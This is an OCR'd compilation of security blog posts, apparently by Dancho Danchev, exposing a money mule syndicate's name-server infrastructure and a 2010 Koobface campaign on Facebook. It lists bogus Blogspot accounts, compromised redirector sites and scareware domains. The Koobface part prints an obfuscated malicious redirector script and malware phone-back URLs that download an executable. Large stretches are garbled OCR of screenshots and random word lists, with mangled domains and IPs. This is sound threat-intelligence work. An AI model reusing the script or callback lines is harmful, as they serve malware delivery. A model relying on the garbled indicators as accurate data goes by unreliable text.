A 64.85.174.146 ——“EL-g 64.85.160.0/20 ——“S-p> 4530517 


nsl.sandhouse.cc m 


sandhouse.cec 


nsl.sandhouse.cc - 64.85.174.146 - Email: taunt@freenetbox.ru - 64.85.160.0/20 - AS30517, 
Great Lakes Comnet, Inc. 

ns2.sandhouse.cc - 204.12.217.253 - AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.- 
KansasCity 

ns3.sandhouse.cc - 74.118.194.82 - AS46664, VolumeDrive 


A 92.63.111.127 ———“EL_g 92.63.110.0/23 ——“S-g» asz29182 


nsltranslatasheep.net we 


translatasheep.net 


nsl.translatasheep.net - 92.63.111.127 - Email: stair@freenetbox.ru - 92.63.110.0/23 - 
AS29182, ISPSYSTEM-AS ISPsystem Autonomous System 

ns2.translatasheep.net - 85.12.46.2 - AS34305, EUROACCESS Global Autonomous System 
ns3.translatasheep.net - 222.35.143.112 - AS38356, TimeNet 


‘ 89.248.166.45 ——NEL gy 99.248.160.0/21 ——“S-pe as29073 


CK nstintisoken Sy 


trythisok.cn 
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ns1.trythisok.cn - 92.63.111.127 - Email: chunk@qx8.ru - AS29182, ISPSYSTEM-AS ISPsystem 
Autonomous System 

ns2.trythisok.cn - 85.12.46.2 - AS34305, EUROACCESS Global Autonomous System 
ns3.trythisok.cn - 222.35.143.235 - AS38356, TimeNet 


EL 64.85.160.0/20 ————2—> AS30517 


. 64.85.174.143 PTR 


b04s09le.corenetworks.net 
uP 


viewdreamercom 


nsl.,viewdreamer.com - 64.85.174.143 - free@freenetbox.ru - 64.85.160.0/20, AS30517, Great 
Lakes Comnet, Inc. 

ns2.,viewdreamer.com - 204.12.217.250 - AS32097, RoadRunner RR-RC-Wholesale Internet, 
Inc.-KansasCity 

ns3.viewdreamer.com - 74.118.194.82 - AS46664, VolumeDrive 


‘ 64.85.174.144 ——MEL_ gy 64.95.160.0/20 ——“S-ge 4530517 


nsl.volcanotime.com i 


volcanotime.com 


nsl.volcanotime.com - 64.85.174.144 - Email: hs@bigmailbox.ru - AS30517, Great Lakes 
Comnet, Inc. 

ns2.volcanotime.com - 204.12.217.251 - AS32097, RoadRunner RR-RC-Wholesale Internet, 
Inc.-KansasCity 

ns3.volcanotime.com - 74.118.194.88 - AS46664, VolumeDrive 


A 64.85.174.145 ——NEL-g 64.95.160.0/20 ——“S-ge AS30517 


nsl.weathernot.net ue 


weathernot.net 


nsl.,weathernot.net - 64.85.174.145 - Email: bowls@5mx.ru - AS30517, Great Lakes Comnet, 
Inc. 

ns2.weathernot.net - 204.12.217.252 - AS32097, RoadRunner RR-RC-Wholesale Internet, 
Inc.-KansasCity 

ns3.weathernot.net - 74.118.194.89 - AS46664, VolumeDrive 
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. 64.85.174.145 ——MEL-y 64.95.160.0/20 ——“S-ge AS30517 


nsl.worldslava.cc 
up 


worldslava.cc 


nsl.worldslava.cc - 64.85.174.145 - Email: fussy@bigmailbox.ru - AS30517, Great Lakes 
Comnet, Inc. 

ns2.worldslava.cc - 204.12.217.252 - AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.- 
KansasCity 

ns3.worldslava.cc - 74.118.194.84 - AS46664, VolumeDrive 


A 64.85.174.144 ——NEL_y 64.95.160.0/20 ——“S-ge AS30517 


ns jockscreamernet ie 


jockscreamer.net 


nsl.jockscreamer.net - 64.85.174.144 - Email: free@freenetbox.ru - AS30517, Great Lakes 
Comnet, Inc. 

ns2.jockscreamer.net - 204.12.217.251 - AS32097, RoadRunner RR-RC-Wholesale Internet, 
Inc.-KansasCity 

ns3.jockscreamer.net - 74.118.194.83 - AS46664, VolumeDrive 


A 64.85.174.146 ——NEL_g 64.95.160.0/20 ——“S-g» AS30517 


nsl.uleaveit.com 
UP 


uleaveit.com 


nsl.uleaveit.com - 64.85.174.146 - Email: plea@qx8.ru - AS30517, Great Lakes Comnet, Inc. 
ns2.uleaveit.com - 204.12.217.253 - AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.- 
KansasCity 

ns3.uleaveit.com - 74.118.194.85 - AS46664, VolumeDrive 


is 74.118.194.84 ——NEL_gy 74.118.192.0/22 ——“S-m> ass6664 


ns1.bergamoto.com = 


bergamoto.com 


nsl.bergamoto.com - 74.118.194.84 - Email: nine@freenetbox.ru - AS46664, VolumeDrive 
ns2.bergamoto.com - 222.35.143.235 - AS38356, TimeNet 
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ns3.bergamoto.com - 85.12.46.2 - AS34305, EUROACCESS Global Autonomous System 


74.118.19482 ——NEL gy 74118192.0/22 ——AS-pe assc664 


A 


CT astatunarce 


diunar.cc 


nsl.diunar.cc - 74.118.194.82 - Email: yuck@maillife.ru - AS46664, VolumeDrive 
ns2.diunar.cc - 222.35.143.112 - AS38356, TimeNet 
ns3.diunar.cc - 85.12.46.2 - AS34305, EUROACCESS Global Autonomous System 


64.85.174147 ——NEL-g 64.85.160.0/20 ——AS-ge AS30517 


- 


nsl.pesenlife.net 
UP 


pesenlife.net 


ns1.pesenlife.net - 64.85.174.147 - Email: erupt@qx8.ru - AS30517, Great Lakes Comnet, Inc. 
ns2.pesenlife.net - 204.12.217.254 - AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.- 
KansasCity 

ns3.pesenlife.net - 74.118.194.86 - AS46664, VolumeDrive 


The business model if this syndicate can be easily compared to the business model of 
the much hyped Russian Business Network in the sense that, they are either managing the 
infrastructure for someone else as a service, are directly involved in the recruitment and 
utilization of money mules for their own purposes, or a basically building inventory of mules 
to offer as a service to a large number of cybercriminals. 


The basic fact that these folks are not campaign-centered, but continue maintaining their 
ecosystem, puts them on the top of watch list for months to come. 


Related coverage of money laundering in the context of cybercrime: 
[9]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[10]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[12]Money Mule Recruiters on Yahoo!’s Web Hosting 

[13]Dissecting an Ongoing Money Mule Recruitment Campaign 
[14]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[15]Keeping Reshipping Mule Recruiters on a Short Leash 
[16]Keeping Money Mule Recruiters on a Short Leash 
[17]Standardizing the Money Mule Recruitment Process 

[18]Inside a Money Laundering Group’s Spamming Operations 
[19]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[20]Money Mules Syndicate Actively Recruiting Since 2002 
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This post has been reproduced from [21]Dancho Danchev’s blog. Follow him [22]on Twitter. 


eps / www, goodreads con/author/quotes/2100..Ariatotla 
_hetp:/ /adanchev. blogspot .con/2009/10/standardizing-noney-aule-recruitaent al 

. https://www.alantron.com/ 

. http: //ddanchev. blogspot . com/2010/04/keeping-money-mule-recruiters-on-short .html 
. http: //ddanchev. blogspot . com/2010/03/keeping-money-mule-recruiters-on-short -html 
. http: //ddanchev. blogspot . com/2010/02/keeping-money-mule-recruiters-on-short .html 


. http://ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short .htm 


ttp://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


. http: //ddanchev.blogspot .com/2010/04/keeping-money-mule-recruiters-on-short .htm 
10. http://ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving.html 


1 
12. 
13 

14 
15. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 
16. 
17 


ttp://ddanchev. blogspot .com/2009/05/inside-money-1laundering-groups- spamming. html 


19. http://ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast.htm 


20. http://ddanchev. blogspot . com/2008/10/money-mules-syndicate-actively.htm 
21. http://ddanchev.blogspot.com/ 
22. http://twitter.com/danchodanche 
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6.4.11 Dissecting Koobface Gang’s_ Latest Facebook Spreading Campaign 
(2010-04-27 14:53) 


San_Up | Quickies (0) | i 


Video posted by ... Hidden Camera ... 


a ie ~ 
Video Responses: 10 Text Comments: 70 


Would you like to comment? 


UPDATED: Thursday, April 29, 2010: Google is aware of these Blogspot accounts, and is 
currently suspending them. 


During the weekend, our "dear friends" from [1]the Koobface gang - folks, you’re so not 
forgotten, with the scale of diversification for your activities to be publicly summarized within 
the next few days - launched another spreading attempt across Facebook, with Koobface- 
infected users posting bogus video links on their walls. 


« Recommended reading: [2]10 things you didn’t know about the Koobface gang 


What’s particularly interesting about the campaign, is that the gang is now start to publicly 
acknowledge its connections with [3]xorg.pl (Malicious software includes 40706 scripting 
exploit(s), 4119 trojan(s), 1897 exploit(s), with an actual subdomain residing there embedded 
on Koobface-serving compromised hosts. 


Moreover, the majority of scareware domains, including the redirectors continue using 
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hosting services in Moldova, AS31252, STARNET-AS StarNet Moldova in particular. 


¢ [4] Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 


With the campaign still ongoing it’s time to dissect it, expose the scareware domains portfolio 
and the AS29073, ECATEL-AS connection, with the Koobface gang a loyal customer of their 
services since November, 2009. AS29073, ECATEL-AS Koobface gang connections: 


¢ [5]Koobface Botnet’s Scareware Business Model - Part Two 


¢ [6]The Koobface Gang Wishes the Industry "Happy Holidays" 


-blogspot,com 


161;1002 


fcrazy_video/main. php? 
fcrazy_video}?main=1 

fer eo} “php 
}go.js?bdb2d9429a28/ 
ig0.js?bdb2d9429a28} 


1573440 | 


-4,22:303 
1,61:764 
*,219:424 


1,195;127 


igo. js?bdb2d9429a28/ 
go. js?bdb2d9429a28/ 
.js?bdb2d9429a28} 
24942928} 


28) 


2 
28} 


Automatically registered Blogspot accounts used as bogus video links across Facebook: 


aashikamorsing.blogspot.com 


alpezajeromie.blogspot.com 
andcoldjackey.blogspot.com 


asiaasiabenzaidi.blogspot.com 


atalaygraciani.blogspot.com 


barsheshetshakirat.blogspot.com 


battittastelzer. blogspot.com 
beckermasico.blogspot.com 
biedlerharjit.blogspot.com 

britainudobot.blogspot.com 


bruchnadirnadir.blogspot.com 


bryonbryonhofhenke.blogspot.com 


ceceliaverner.blogspot.com 


centofantiaviran.blogspot.com 
codeycodeymarcott.blogspot.com 
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cottinghamginnyginny.blogspot.com 
courtenayharry.blogspot.com 
dalton-daviesheinee.blogspot.com 
dipietroaudrea.blogspot.com 
ericssonbrigid.blogspot.com 
ervinervinturnquest.blogspot.com 
fashingbauerkylerkyler.blogspot.com 
felicetanae.blogspot.com 
friedamignogna.blogspot.com 
friedlamiraslani.blogspot.com 
garthgarthheal.blogspot.com 
gavin-williamslielie.blogspot.com 
ginnoviaharbottle. blogspot.com 
grinolsisanna.blogspot.com 
hamiltondesantis.blogspot.com 
hananhananmoros-hanley.blogspot.com 
heberheberdellinger. blogspot.com 
iftikharkacykacy.blogspot.com 
imtiazzimmer.blogspot.com 
ireneirenejasmen.blogspot.com 
jacojacowintermeyer.blogspot.com 
jameishaleninger.blogspot.com 
jhalaagustin.blogspot.com 
johnathenmirani.blogspot.com 
kassablynnelle.blogspot.com 
kaycieazoni.blogspot.com 
keeferjeneejenee. blogspot.com 
keibakeibaclarembeaux.blogspot.com 
kieroncrowdus.blogspot.com 
kilcullenheadhead.blogspot.com 
kreuzaavins.blogspot.com 
labbatoalphaj.blogspot.com 
lellpeyton.blogspot.com 
marleenmckoi.blogspot.com 
mccarlbargin.blogspot.com 
mendizabalnayranayra.blogspot.com 
mitranoshaghayegh.blogspot.com 
momoneybeltz.blogspot.com 
mushenkolirian.blogspot.com 
navarretemcarthur.blogspot.com 
nekolnekoltasler. blogspot.com 
nightrasteyn.blogspot.com 
nushnushcave.blogspot.com 
ortiz-maynardyvreene.blogspot.com 
padalinodarcydarcy.blogspot.com 
pantslalala.blogspot.com 
papsteinhatemwahsh.blogspot.com 
pavanpavandekelver.blogspot.com 
pencekleighan.blogspot.com 
puzderdenzel.blogspot.com 
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rabiarabiacarruth.blogspot.com 
raeferaefejhanmmat.blogspot.com 
raheelolu.blogspot.com 
ranaranakundu.blogspot.com 
sabeenhunjan.blogspot.com 
serroukhshymia.blogspot.com 
sertimamislay.blogspot.com 
shannonschronce.blogspot.com 
sheridanpaltiel.blogspot.com 
slomovitzvaughna.blogspot.com 
soccicoitcoit.blogspot.com 
stengel-bohneinaveinav.blogspot.com 
suedeglenna.blogspot.com 
sylvainbarnes-rivers.blogspot.com 
tammeybutenko.blogspot.com 
tartagliatrayvis.blogspot.com 
tasunanette.blogspot.com 
teddiedommasch. blogspot.com 
temitopetodorova.blogspot.com 
terranovataiwan.blogspot.com 
torneyatsushi.blogspot.com 
trovatohaiahaia.blogspot.com 
tuncelintrieri.blogspot.com 
vislayovadovad.blogspot.com 
wellkensie.blogspot.com 
yabsleyjessajessa.blogspot.com 
zedzedmorelle.blogspot.com 


UPDATED: Thursday, April 29, 2010: Another update on Blogspot Accounts courtesy of 
the Koobface gang: 
aaslehnekaya.blogspot.com 
aimanaimanpaulis.blogspot.com 
altonaltonbruyninckx. blogspot.com 
annemiekenorford.blogspot.com 
asghardch.blogspot.com 
atencioishmael.blogspot.com 
ativanichayaphongdionysios.blogspot.com 
ayorindesavoia.blogspot.com 
bagnoandreae.blogspot.com 
bakalarczykmaipumaipu.blogspot.com 
baribarithulin.blogspot.com 
beavordawnedawne.blogspot.com 
boninidivandivan.blogspot.com 
cabooterfinne.blogspot.com 
chakkarinlehnertz.blogspot.com 
chavarriaarumugam.blogspot.com 
coleirolenaylenay.blogspot.com 
colkittmogens.blogspot.com 
crummittgerhardt.blogspot.com 
dahmeialeveque.blogspot.com 
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dalmolinparamparam.blogspot.com 
danaedanaemadan.blogspot.com 
danmakumaak.blogspot.com 
dauntazusaazusa.blogspot.com 
devrimmasaimasai.blogspot.com 
dicksdeplancke.blogspot.com 
dormiedyismael.blogspot.com 
dremadremareany.blogspot.com 
duffinflippen. blogspot.com 
eliyahneubecker. blogspot.com 
eloragiogio.blogspot.com 
faubertmacarena.blogspot.com 
friedlamiraslani.blogspot.com 
gallianinijanija.blogspot.com 
gandolphscootscoot.blogspot.com 
garbsayrinayrin. blogspot.com 
geerbergpovlpovl.blogspot.com 
gennygennytjoeng.blogspot.com 
gianiniomegalmegal.blogspot.com 
griffithlampack-layton. blogspot.com 
guerrettebrchibrchi.blogspot.com 
guillemineauramyaramya.blogspot.com 
gunheedomenick.blogspot.com 
haisedymond.blogspot.com 
halahalafales.blogspot.com 
hamidoujacijaci.blogspot.com 
hamminganoush. blogspot.com 
honamisouliotis.blogspot.com 
japeriagoding. blogspot.com 
jaymeecleto.blogspot.com 
jinghuamarmorale.blogspot.com 
kadeemrebsamen. blogspot.com 
karokaroliney.blogspot.com 
kashmirahoeger.blogspot.com 
kasidasaugust.blogspot.com 
kattylaitia.blogspot.com 
kaynatferetos.blogspot.com 
kimberlikohImann.blogspot.com 
kissikshaney.blogspot.com 
kjerstisatterwhite-landry. blogspot.com 
korbessamessam. blogspot.com 
kozubmarshand.blogspot.com 
kruthjancijanci.blogspot.com 
krystellecahoon.blogspot.com 
kuroiwadelphdelph.blogspot.com 
laakkokimkim.blogspot.com 
labbatoalphaj.blogspot.com 
leichtmarjmarj.blogspot.com 
leludis-matarangasdeyonna.blogspot.com 
lescailletpetopeto.blogspot.com 
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letsongrover.blogspot.com 
liermanramadan.blogspot.com 
lindingrajkishan. blogspot.com 
linsjerchell.blogspot.com 
lorrilorrihosgor.blogspot.com 
maglifitfit.blogspot.com 
matsumarudeserae.blogspot.com 
mcsteinniecey.blogspot.com 
melitalynnelynne.blogspot.com 
menezeswendywendy.blogspot.com 
mimosepalazon.blogspot.com 
mottmottzengel.blogspot.com 
naysanmutton.blogspot.com 
nicolenabershon.blogspot.com 
nidonidobuetow.blogspot.com 
ninaninalottin. blogspot.com 
nonziodarasha.blogspot.com 
pandushalmon.blogspot.com 
pawelpawelpoti.blogspot.com 
paytonbeegle.blogspot.com 
phillipoeleaseleas.blogspot.com 
philpottlurelle.blogspot.com 
pipenhagennguyen. blogspot.com 
plattsdatoria.blogspot.com 
plomaritislaurylaury.blogspot.com 
polmantameltamel.blogspot.com 
polopoloangulo.blogspot.com 
porrettifarmers.blogspot.com 
radieradiecatalina. blogspot.com 
raenellegreathouse.blogspot.com 
ranaeranaerossy.blogspot.com 
reidreidmiele-crifo.blogspot.com 
rickyrickydonis. blogspot.com 
roselinegilvin.blogspot.com 
russobriarbriar.blogspot.com 
salizaguayanilla.blogspot.com 
samuelesedere.blogspot.com 
sanchepascasie.blogspot.com 
sangyoungpadalecki.blogspot.com 
scarthscrewlie.blogspot.com 
schaumburgirishirish. blogspot.com 
schubringdheledhele.blogspot.com 
scorahchreechree.blogspot.com 
shakehcoletto. blogspot.com 
shaqaregqninette.blogspot.com 
shaw-zorichemmanemman.blogspot.com 
shortalgerongeron.blogspot.com 
singhoffertymisha.blogspot.com 
sinnathuraiperminas.blogspot.com 
skjutarevikram.blogspot.com 
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spataforaannamay.blogspot.com 
staats-meliaahronahron.blogspot.com 
tagantagankissane.blogspot.com 
tamietamiedemirkol. blogspot.com 
tamillecavitt.blogspot.com 
tommiekerstetter. blogspot.com 
tosunsangbum.blogspot.com 
treechadacoppage.blogspot.com 
treziajoanjoan.blogspot.com 
triadorlachauna.blogspot.com 
tukellyaburrage.blogspot.com 
tyrisaoverly.blogspot.com 
ulrikaraithatha.blogspot.com 
valericlarissa.blogspot.com 
ventronejokerjoker.blogspot.com 
victorinomeharmehar.blogspot.com 
vikvikruaut.blogspot.com 
virajanrajan.blogspot.com 
wasonmarilynn.blogspot.com 
wendewendeschyma. blogspot.com 
whitwhitmontoure.blogspot.com 
wynnhannan.blogspot.com 
xochitlvillenurve.blogspot.com 
yaoskalongthorne.blogspot.com 
youyoustreit.blogspot.com 
zickkirrakirra.blogspot.com 


crisis QF gleam lambaste Ene? outwit rob skver staboe sufScient tumultsous twine 


blight boor boorish duress infernal nominate old-fashioned put-up rubbish suggestive tamper tolly 


chque consultant cycle down edification femt heavy-handed impact loose make-up pleasure quack shrubbery tncky 
basic dapple fickle hasmiess leaden mute performance te 


amply clergyman chsgusting Grst-rate generaly length merry perumeter prepare rough tempestsous umreined wsitor 


cannibal chime distinct for gust gut march mockery persuasive rationale scravl slim stoicisms stray testimonial 


cap downwards enchanting flout frightful fritter gratitude migrant mismatched officer playboy single-minded 


active adolescent deviate expedite Emery Hash for obsessrve premedtated prepare settle sobdamty saggestible 


couch cur able ply refuse? scepticism secunty nl? 


addct sp interval mvanable yurmble mournful mutamon noweless resemble secular 


an -) 


bowly combine devious godsend landlady lasting revelry rou, skin social uproanous 


book boundary crest engraving fitful hop idyllic memory personally popularity raise remiss revolve stipulate 


bereave discriminating enigina hurch® moonshine nab pristine rap anated 
aged ahead calendar haw invitmg metropolis paramount reconnottre understand upheaval usage 


The Blogspot accounts redirect to the following compromised Koobface and scareware serving 
domains: 
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cartujo.org /private-clips/main.php?87bb8f2 
cerclewalloncouillet.be /main.movie/main.php?28d 
cseajudiciary.org /animateddvd/main.php?c8 
de-nachtegaele.be /main/main.php?b04ebb 

ediltermo.com /common.film/main.php?deccfd 
forwardmarchministries.org /candid movie/main.php?42d1 
highway77truckservice.com /pretty-clip/main.php?7bb2 
kcresale.com /crazyvids/main.php?2ee 
libermann.phpnet.org /comicperformans/main.php?9b5a5a 
lode-willems.be /cute _clip/main.php?be2 
lunaairforlife.com /crucial-clips/main.php?d3d6ccfe 
mainteck-fr.com /complete-movie/main.php?f6 
nottinghamdowns.com /criminaltube/main.php?2388d 
programs.ppbsa.org /crazy video/main.php?0ea1969 
richmondpowerboat.com /yourtv/main.php?89fbO 
scheron.com /delightful demonstration/main.php?e2f92 
Training.ppbsa.org /comic dvd/main.php?f9261f 
vangecars.it /crazy-films/main.php?827da 


Detection rates for Koobface samples and a sampled scareware: 

- setup.exe - [7]Trojan.Generic.KD.8890 - Result: 9/40 (22.50 %) phones back to: 

- proelec-dpt.fr/.85rfs/?action=Idgen &a=-1394498804 &v=108 &c fb=0 &ie=7.0.5730.13 
- proelec-dpt.fr/.85rfs/?action=fbgen &v=108 &crc=669 

- proelec-dpt.fr/.85rfs/?getexe=p.exe 


- p.exe - [8]Trojan.Drop.Koobface.J; W32/Koobface.GUB - Result: 5/41 (12.2 %) 
- koob.js - [9]Trojan:JS/Redirector - Result: 1/41 (2.44 %) 


<title>Loading</title> 

Geeta name*“robots” content*"noindex, nofollow, noarchive"> 

<soript> 

function a890b07ar4bS7e3 03 £62 () (tey{ vindov. parent. location=location: }catch(e) () try(vindov.top. location=location: )catch(e) 
() } window. onerror*a890b0 TatibS Te 03 £62; sf (window. parent . frames. length>0) if (window. parent .document .body. innerBTML) ; 
</script> 

<soript> 

betods t7delsaceTale"NqxShjecluvcatEye”. replace ( 


7ic() (var anabt 


° i7aatse< 
eft-1730da44;))} function betbhzashet 


{*unload’, hedbb2a6b6876, false) : 


19c64b3 dbO06fbd-*<fnj bOIKEqQuseklEqckTimql binndo=pict péf4openianoqdnnbagcr viqijdftntmolhof*0) jkhinelojimngih)jtmnk=j)ff0qq”.replace(/ 


k2119c64b3dbO6fhd+=" gkgCbtlesAbmomweS fox IgtD lp=qtCriyvL khkxSubblacdbpme: neqi 6cgBnwnt FsxgSekl2utbaviogSup) wctmly-th3 ubSyermioyAlcgs-tugr] 
tnlj Bavxy lmvvSvngnivs-yt ytedyvits0 luqvecg|OegnioséhalFknk) c9ibaFpqqkaAt vAitqyé6qga".replace (/ (gkbtsmvjoxflpaqriyvhusenc) +/g,"")2 
k2119cé4b3dbO6fbde" loot yhhpmeghgh*hathpkgepish ldimemynat idhodkdnh/ khgxgg-dwotideokhbhjegkegtgth>gh <gPfAkfdRhkigkEh".replace (/ (Jashgfd) «/ 


JcLb1ii0£iib= . 
é64b3 dbOé6rbder" gs a yaMh & MEK Is 5 igkt jroigs hagqrhitaqp 


qguke*fnpohcnkjecbpg>c”.replace (/ (khpcbjgf) +/g,"")s 


CARAKDNKKk jJpnjgajb je} *ffub Jodege ckbv tha 
19c6 GdgPdhALiRkbAikED ckhndkacgemjpei-pPijbplathyibphChfodkughincdtgg!t dvi jafcdlftdhkugdhhfeghSphastec9gh9r 
<de/ hbOcbBgd ageEhbC ohh Tps>k2". replace (/ (gdhtikbejp) +/g,""): 

@ocwment. write (k2119c64b3dbO6fbd) : 


The scareware serving domain embedded on all of the Koobface-serving compromised hosts 
is internet-scanner.xorg.pl?mid=312 &code=4db12f &d=1 &s=2 - 195.5.161.125 - AS31252, 
STARNET-AS StarNet Moldova. 
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Parked on 195.5.161.125 is the rest of the scareware domains portfolio: 
antispy-detectnl1.com - Email: test@now.net.cn 
antispy-detectn2.com - Email: test@now.net.cn 
antispy-detectn3.com - Email: test@now.net.cn 
antispy-detectn5.com - Email: test@now.net.cn 
antispy-detectn7.com - Email: test@now.net.cn 
antispy-detectz2.com - Email: test@now.net.cn 
antispy-detectz4.com - Email: test@now.net.cn 
antispy-detectz5.com - Email: test@now.net.cn 
antispy-detectz7.com - Email: test@now.net.cn 
antispy-detectz9.com - Email: test@now.net.cn 
antispy-scan4i.com - Email: test@now.net.cn 
antispy-scan5i.com - Email: test@now.net.cn 
antispy-scan6i.com - Email: test@now.net.cn 
antispy-scan7i.com - Email: test@now.net.cn 
antispyscan85.com - Email: test@now.net.cn 
antispyscan89.com - Email: test@now.net.cn 
antispyscan91.com - Email: test@now.net.cn 
antispyscan92.com - Email: test@now.net.cn 
antispyscan93.com - Email: test@now.net.cn 
antispy-scan9i.com - Email: test@now.net.cn 
antispyware-nol.com - Email: test@now.net.cn 
antispyware-no3.com - Email: test@now.net.cn 


antivirla.com.xorg.pl 

antivirus-detect21.com - Email: test@now.net.cn 
antivirus-detect23.com - Email: test@now.net.cn 
antivirus-detect25.com - Email: test@now.net.cn 
antivirus-detect27.com - Email: test@now.net.cn 
antivirus-detect29.com - Email: test@now.net.cn 
antivirus-detectz1l.com - Email: test@now.net.cn 
antivirus-detectz2.com - Email: test@now.net.cn 
antivirus-detectz5.com - Email: test@now.net.cn 
antivirus-detectz7.com - Email: test@now.net.cn 
antivirus-detectz9.com - Email: test@now.net.cn 
antivirus-lvl.com - Email: test@now.net.cn 
antivirus-lv2.com - Email: test@now.net.cn 
antivirus-lv3.com - Email: test@now.net.cn 
antivirus-lv5.com - Email: test@now.net.cn 
antivirus-lv8.com - Email: test@now.net.cn 
antivirus-topl.com - Email: test@now.net.cn 
antivirus-top2.com - Email: test@now.net.cn 
antivirus-top6.com - Email: test@now.net.cn 
antivirus-top8.com - Email: test@now.net.cn 
be-secured.xorg.pl 
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antspy detec] com 


arntspy scan7icom 


arfspyware7o3 com 


arfirus detert23 com 


aritus-detert?s. com 


affitus-ceter? com 


anfivirus-detert29 com 


antinss 20) Com 


antvews 2p2 com 


Qe? protectom xorg pl 


Spyware sweep] com \| 


Spyware-sweeplicom 


spyware sweep2i com 


soyware-sweepd.com 


Spyeare-gweepdi com 


Spyware-sweepsicom 


Spyware sweeps com 


Spyware sweep? com 


Soyware sweepB com 


Spyware Sweeps com 


views Sweeperte com 


views -sweecer] com 


Vitus sweeper? com 


vows sweepers. com 


views sweeperé.com 


veus sweepers com 


bestantivirus1.com.xorg.pl 
bestscanmalware.com.xorg.pl 


best-security.xorg.pl 
defender20.xorg.pl 


fastantivirusscanner15.com.xorg.pl 
fastmalwarescan15.com.xorg.pl 


fast-scan.xorg.pl 


fastweb-scanner.com.xorg.pl 


get-protection.xorg.pl 
my-computers.xorg.pl 
protection100.xorg.pl 


protection-center1.xorg.pl 


protector10.xorg.pl 


securel10.xorg.pl 


9S 5.161024 ——Ah-ge AS31252 
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security1.xorg.pl 

security100.xorg.pl 

spy-defenderl.com 
spydefenderl.com.xorg.pl 
spydefender11.com.xorg.pl 
spy-defenderla.com - Email: test@now.net.cn 
spy-defender2.com - Email: test@now.net.cn 
spy-defender2a.com - Email: test@now.net.cn 
spy-defender4a.com - Email: test@now.net.cn 
spy-defender5.com - Email: test@now.net.cn 
spy-defender6a.com - Email: test@now.net.cn 
spy-defender8a.com - Email: test@now.net.cn 
spy-defender9.com - Email: test@now.net.cn 


spy-protection0l.com - Email: test@now.net.cn 
spy-protectionl.com - Email: test@now.net.cn 
spy-protection14.com - Email: test@now.net.cn 
spy-protection17.com - Email: test@now.net.cn 
spy-protection19.com - Email: test@now.net.cn 
spy-protection3.com - Email: test@now.net.cn 
spy-protection4.com - Email: test@now.net.cn 
spy-protection6.com - Email: test@now.net.cn 
spy-protection8.com - Email: test@now.net.cn 
spy-scanner2i.com - Email: test@now.net.cn 
spy-scanner6i.com - Email: test@now.net.cn 
spy-scanner8i.com - Email: test@now.net.cn 
spyware-sweep1.com - Email: test@now.net.cn 
spyware-sweepli.com - Email: test@now.net.cn 
spyware-sweepz2i.com - Email: test@now.net.cn 
spyware-sweep3.com - Email: test@now.net.cn 
spyware-sweep3i.com - Email: test@now.net.cn 
spyware-sweep4i.com - Email: test@now.net.cn 
spyware-sweep5.com - Email: test@now.net.cn 
spyware-sweep7.com - Email: test@now.net.cn 
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La) View system infcemation ad Dred Documents My Documents 
@ 6 Vwuses found Q 6 Vwuses found 


Hard drive 


DD Add c remove prograns 


* Wiedows Security Alert 
DB crarige a settings 


7 
To help protect yor 


1 
Ny have detected Troj 


Hard driwe (C:) 
her Plc 
i] 12 Viruses found 


Bd my Netreork Places Securty 


&) om) documents Catected spyware and aduare on your compuker 
CD Sed Qocumerts Windows Securtty @ AdrWorettotbor 
Security is afllected by virus Q waz Mypics. Worm 26352 


OD cortrel Pare 


O W32Nerda erm 
@ Backdoor. Wint2 samdoor.gu Cwrectilog 
@ Trojent aealert 355 herberos dl 


r Spywere 6 software, which can gather information from user's computer 


Name Tyee Threat level Crouge Internet comection and send Mem to ts crester. Gather 


Q Adveraretotber Vrus tegh A ev ormation Can be passwords, emal adresses and of that date, whichis 
O Wo2Mypics. Worm 36352 vas Medina eens 

O wie Nmda rte vs Medians 

 Gackdoor.winS2Haxdeor.qu Vrus High 

@ TrojanFakestert.355 Wus Medum 

» Sagan 7. F 

Recommend: Cick “Start Protection” button to erase af threats tawt Protector 


spyware-sweep8.com - Email: test@now.net.cn 
spyware-sweepQi.com - Email: test@now.net.cn 
virus-sweeperOi.com - Email: test@now.net.cn 
virus-sweeperl.com - Email: test@now.net.cn 
virus-Ssweeper2.com - Email: test@now.net.cn 
virus-Ssweeper2i.com - Email: test@now.net.cn 
virus-sweeper3.com - Email: test@now.net.cn 
virus-sweeper4i.com - Email: test@now.net.cn 
virus-sweeper6.com - Email: test@now.net.cn 
virus-sweeper7i.com - Email: test@now.net.cn 
virus-sweeper8.com - Email: test@now.net.cn 
virus-sweeper8i.com - Email: test@now.net.cn 
win-antispyware10.com.xorg.pl 
windefender1.xorg.pl 

windows-secure.xorg.pl 

win-security.xorg.pl 
winwebscanner10.com.xorg.pl 


Parked within AS31252, STARNET-AS StarNet Moldova are also: 195.5.161.11; 195.5.161.145 
spy-scanner20.com - Email: test@now.net.cn 

spy-scanner30.com - Email: test@now.net.cn 

spy-scanner3i.com - Email: test@now.net.cn 

spy-scanner40.com - Email: test@now.net.cn 

spy-scanner4i.com - Email: test@now.net.cn 

spy-scanner60.com - Email: test@now.net.cn 

spy-scanner80.com - Email: test@now.net.cn 

virscanner-done4.com - Email: test@now.net.cn 

virscanner-done5.com - Email: test@now.net.cn 


- Detection rate for the scareware sample: Setup _312s2.exe - [10]Heuris- 
tic.BehavesLike.Win32.Trojan.H - Result: 5/40 (12.50 %) phones back to windows- 
mode.com/?b=1sl1 - 89.248.168.21, AS29073, ECATEL-AS , Ecatel Network - Email: 
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contact@privacy-protect.cn 


antispywarelist.com 


checkwhitelist.com 


chekmalwarelist.com 


89.248.168.21 89.248.168.0/24 ——“S-ge as29073 


firewall-rules2.com 
systemreserves.com 


windows-mode.com 


Parked on the phone-back IP are also the following domains: 
firewall-rules2.com - Email: contact@privacy-protect.cn 
version-upgrade.com - Email: contact@privacy-protect.cn 
